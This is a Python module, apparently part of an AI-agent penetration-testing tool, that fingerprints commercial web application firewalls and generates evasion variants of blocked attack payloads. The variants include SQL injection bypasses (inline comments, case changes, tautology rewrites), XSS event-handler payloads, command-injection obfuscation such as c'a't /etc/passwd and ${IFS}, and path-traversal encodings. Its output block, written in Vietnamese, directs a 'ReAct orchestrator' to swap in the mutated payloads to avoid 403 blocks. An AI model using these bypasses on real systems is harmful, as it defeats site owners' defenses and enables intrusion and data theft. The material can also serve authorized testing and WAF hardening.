"""Dynamic Defense Fingerprinting & WAF Rule Decompiler.

Fingerprints active Web Application Firewalls (Cloudflare, ModSecurity, AWS WAF,
Imperva, Akamai, F5 BIG-IP) and reverse-engineers blocked payload syntax to
decompile triggering regex rules (OWASP CRS Rule IDs) and synthesize token-level
evasion bypasses.
"""

from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Any, Optional


@dataclass
class BlockedTokenAnalysis:
    """Detailed reverse-engineered analysis of a blocked payload."""

    detected_waf: str
    original_payload: str
    blocked_tokens: list[str]
    probable_rule_id: str
    recommended_evasions: list[str]
    mutated_alternatives: list[str]

    def format_block(self) -> str:
        """Format tactical WAF decompiler directive for the ReAct orchestrator."""
        tokens_str = ", ".join(f"`{t}`" for t in self.blocked_tokens)
        evasions_str = "\n".join(f"   - {e}" for e in self.recommended_evasions)
        alts_str = "\n".join(f"   • `{m}`" for m in self.mutated_alternatives[:3])

        return (
            f"🛡️ [GIẢI MÃ QUY TẮC PHÒNG THỦ WAF & BỘ LỌC TỰ ĐỘNG]\n"
            f"• WAF Nhận Diện: {self.detected_waf or 'Generic WAF/IPS'}\n"
            f"• Token Gây Kích Hoạt Bộ Lọc (Trigger): {tokens_str or 'Chuỗi truy vấn bất thường'}\n"
            f"• Quy Tắc Tương Quan Dự Đoán: {self.probable_rule_id}\n"
            f"• Chiến Thuật Vượt Qua (Evasion Recommendations):\n{evasions_str}\n"
            f"• Các Biến Thể Đã Đột Biến (Mutated Payloads Sẵn Sàng):\n{alts_str}\n"
            f"➔ HÃY THAY THẾ PAYLOAD BẰNG CÁC BIẾN THỂ TRÊN ĐỂ TRÁNH BỊ CHẶN HTTP 403/406."
        )


class WAFFingerprinter:
    """Dynamic WAF behavior analyzer and rule decompiler."""

    # Signatures for prominent enterprise WAF engines
    WAF_SIGNATURES: dict[str, dict[str, Any]] = {
        "Cloudflare": {
            "headers": ["cf-ray", "cf-cache-status", "__cf_bm", "cf-request-id"],
            "body": ["cloudflare", "ray id:", "error 1020", "attention required! | cloudflare"],
            "status_codes": [403, 503],
        },
        "ModSecurity / OWASP CRS": {
            "headers": ["mod_security", "owasp_crs"],
            "body": ["mod_security", "owasp_crs", "this error was generated by mod_security", "not acceptable"],
            "status_codes": [403, 406],
        },
        "AWS WAF": {
            "headers": ["x-amzn-requestid", "x-amz-cf-id", "awswaf"],
            "body": ["403 forbidden", "request blocked by aws waf"],
            "status_codes": [403],
        },
        "Imperva / Incapsula": {
            "headers": ["x-cdn: incapsula", "_incap_ses", "visid_incap"],
            "body": ["incapsula incident", "powered by incapsula"],
            "status_codes": [403],
        },
        "Akamai": {
            "headers": ["akamaighost", "x-akamai-transformed"],
            "body": ["akamaighost", "reference #"],
            "status_codes": [403],
        },
        "F5 BIG-IP / ASM": {
            "headers": ["bigip", "x-wa-info"],
            "body": ["the requested url was rejected. please consult with your administrator", "ts01"],
            "status_codes": [403],
        },
    }

    # Syntactic signature patterns matched against OWASP CRS Rule IDs
    TOKEN_RULES: list[dict[str, Any]] = [
        {
            "category": "SQLi_Union",
            "regex": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE),
            "rule_id": "OWASP CRS 942100: SQL Injection Attempt (UNION SELECT)",
            "blocked_tokens": ["UNION SELECT"],
            "evasions": [
                "Chèn inline comment: UNION/**/SELECT",
                "Mã hóa URL kép (Double URL Encode): %2555%254e%2549%254f%254e",
                "Thay đổi chữ hoa chữ thường: uNiOn/**/sElEcT",
            ],
            "mutator": lambda p: re.sub(r"(?i)union\s+select", "uNiOn/**/sElEcT", p),
        },
        {
            "category": "SQLi_Tautology",
            "regex": re.compile(r"""(?:'|")\s*(?:or|and)\s+(?:['"]?[0-9]+['"]?\s*=\s*['"]?[0-9]+['"]?|true|false)""", re.IGNORECASE),
            "rule_id": "OWASP CRS 942140: SQL Injection Tautology (OR 1=1)",
            "blocked_tokens": ["' OR 1=1", "OR '1'='1'"],
            "evasions": [
                "Sử dụng phép so sánh số học: OR 2>1 hoặc OR 3*3=9",
                "Loại bỏ dấu nháy bằng hàm ký tự: OR CHAR(49)=CHAR(49)",
                "Dùng biểu thức chuỗi tương đương: OR 'a' LIKE 'a'",
            ],
            "mutator": lambda p: re.sub(r"""(?i)['"]\s*or\s+['"]?1['"]?\s*=\s*['"]?1['"]?""", "/**/OR/**/3>2", p),
        },
        {
            "category": "SQLi_Time_Blind",
            "regex": re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.IGNORECASE),
            "rule_id": "OWASP CRS 942160: Time-based SQL Injection Function",
            "blocked_tokens": ["SLEEP()", "BENCHMARK()"],
            "evasions": [
                "Sử dụng hàm thời gian thay thế của hệ quản trị CSDL đích",
                "Chèn inline comment giữa tên hàm và ngoặc: SLEEP/**/(5)",
                "Dùng biểu thức tính toán độ trễ nặng (Heavy Mathematical Cartesian Join)",
            ],
            "mutator": lambda p: re.sub(r"(?i)sleep\s*\((\d+)\)", r"sLeEp/**/(\1)", p),
        },
        {
            "category": "XSS_Script_Tag",
            "regex": re.compile(r"<\s*script\b[^>]*>", re.IGNORECASE),
            "rule_id": "OWASP CRS 941100: XSS Filter (Script Tag Injection)",
            "blocked_tokens": ["<script>"],
            "evasions": [
                "Chuyển sang thẻ HTML5 có event handler: <img src=x onerror=...>",
                "Dùng thẻ SVG / MathML: <svg onload=...>",
                "Mã hóa HTML entities hoặc UTF-7/16 nếu ứng dụng giải mã",
            ],
            "mutator": lambda p: re.sub(r"(?i)<\s*script\b[^>]*>.*?</\s*script\s*>", "<img src=x onerror=alert(1)>", p),
        },
        {
            "category": "XSS_Event_Handler",
            "regex": re.compile(r"\b(?:onerror|onload|onclick|onmouseover|eval|javascript:)\b", re.IGNORECASE),
            "rule_id": "OWASP CRS 941120: XSS Inline Event Handler",
            "blocked_tokens": ["onerror=", "onload=", "javascript:"],
            "evasions": [
                "Tận dụng autofocus trên input: <input autofocus onfocus=...>",
                "Phân tách bằng dấu gạch chéo: onmouseover/**/=",
                "Dùng fetch / dynamic import qua base64 data URI",
            ],
            "mutator": lambda p: re.sub(r"(?i)onerror\s*=", "oNeRrOr/**/=", p),
        },
        {
            "category": "RCE_Command_Chaining",
            "regex": re.compile(r"(?:;|\|\||&&|`|\$\([^)]+\))\s*(?:cat|id|whoami|ls|curl|wget|nc|sh|bash)\b", re.IGNORECASE),
            "rule_id": "OWASP CRS 932100: Remote Command Execution / Shell Injection",
            "blocked_tokens": ["; cat", "&& whoami", "| id", "$()"],
            "evasions": [
                "Dùng biến môi trường để phân tách chuỗi: $u/bin$u/id hoặc ${IFS}",
                "Thay thế khoảng trắng bằng $IFS$9 hoặc tab (%09)",
                "Dùng nháy đơn/kép rỗng để che giấu binary: c'a't /etc/passwd hoặc w\"h\"oami",
            ],
            "mutator": lambda p: re.sub(r"(?i)(cat|whoami|id)", lambda m: f"'{m.group(1)[0]}'{m.group(1)[1:]}", p),
        },
        {
            "category": "Path_Traversal",
            "regex": re.compile(r"(?:\.\./|\.\.\\|%2e%2e%2f|%2e%2e/)", re.IGNORECASE),
            "rule_id": "OWASP CRS 930100: Path Traversal / Directory Climbing",
            "blocked_tokens": ["../", "..\\", "%2e%2e%2f"],
            "evasions": [
                "Mã hóa lồng nhau: ....//....// hoặc ..;/..;/",
                "Mã hóa UTF-8 overlong: %c0%ae%c0%ae%c0%af",
                "Dùng dấu gạch chéo ngược trên Windows/IIS: ..%5c..%5c",
            ],
            "mutator": lambda p: p.replace("../", "....//").replace("..\\", "....\\\\"),
        },
    ]

    def fingerprint(
        self,
        status_code: int,
        headers: dict[str, Any],
        body: str = "",
    ) -> Optional[str]:
        """Detect WAF vendor based on HTTP response status, headers, and body."""
        headers_lower = {k.lower(): str(v).lower() for k, v in headers.items()}
        body_lower = (body or "").lower()

        for vendor, sig in self.WAF_SIGNATURES.items():
            # Check headers
            for h in sig["headers"]:
                if any(h in hk or h in hv for hk, hv in headers_lower.items()):
                    return vendor

            # Check status code and body
            if status_code in sig["status_codes"]:
                for b_marker in sig["body"]:
                    if b_marker in body_lower:
                        return vendor

        # Fallback heuristic for generic blocks
        if status_code in (403, 406, 429) and any(kw in body_lower for kw in ("waf", "blocked", "forbidden", "firewall", "incident")):
            return "Generic Web Application Firewall"

        return None

    def decompile_blocked_payload(
        self,
        payload: str,
        detected_waf: str = "",
    ) -> BlockedTokenAnalysis:
        """Analyze a payload to determine which syntactic tokens triggered WAF rules."""
        matched_rules: list[dict[str, Any]] = []

        for rule in self.TOKEN_RULES:
            if rule["regex"].search(payload):
                matched_rules.append(rule)

        if not matched_rules:
            # Fallback for arbitrary strings
            return BlockedTokenAnalysis(
                detected_waf=detected_waf or "Generic WAF/Filter",
                original_payload=payload,
                blocked_tokens=["Unidentified suspicious pattern"],
                probable_rule_id="OWASP CRS 949110: Inbound Anomaly Score Exceeded",
                recommended_evasions=[
                    "Áp dụng mã hóa URL kép (%25XX)",
                    "Thay thế ký tự đặc biệt bằng biểu diễn thập lục phân (Hex Encoding)",
                    "Giảm kích thước payload và chèn khoảng trắng giả lập (Tabs/Newlines)",
                ],
                mutated_alternatives=[
                    payload.replace(" ", "%20"),
                    payload.replace(" ", "/**/"),
                ],
            )

        # Aggregate matched tokens, rules, evasions, and mutations
        all_tokens: list[str] = []
        all_rules: list[str] = []
        all_evasions: list[str] = []
        mutated_variants: list[str] = []

        for r in matched_rules:
            all_tokens.extend(r["blocked_tokens"])
            all_rules.append(r["rule_id"])
            all_evasions.extend(r["evasions"])
            mutated = r["mutator"](payload)
            if mutated != payload and mutated not in mutated_variants:
                mutated_variants.append(mutated)

        # Deduplicate while preserving order
        unique_tokens = list(dict.fromkeys(all_tokens))
        unique_evasions = list(dict.fromkeys(all_evasions))

        return BlockedTokenAnalysis(
            detected_waf=detected_waf or "Generic WAF",
            original_payload=payload,
            blocked_tokens=unique_tokens,
            probable_rule_id=all_rules[0] if all_rules else "OWASP CRS 942100",
            recommended_evasions=unique_evasions,
            mutated_alternatives=mutated_variants or [payload],
        )
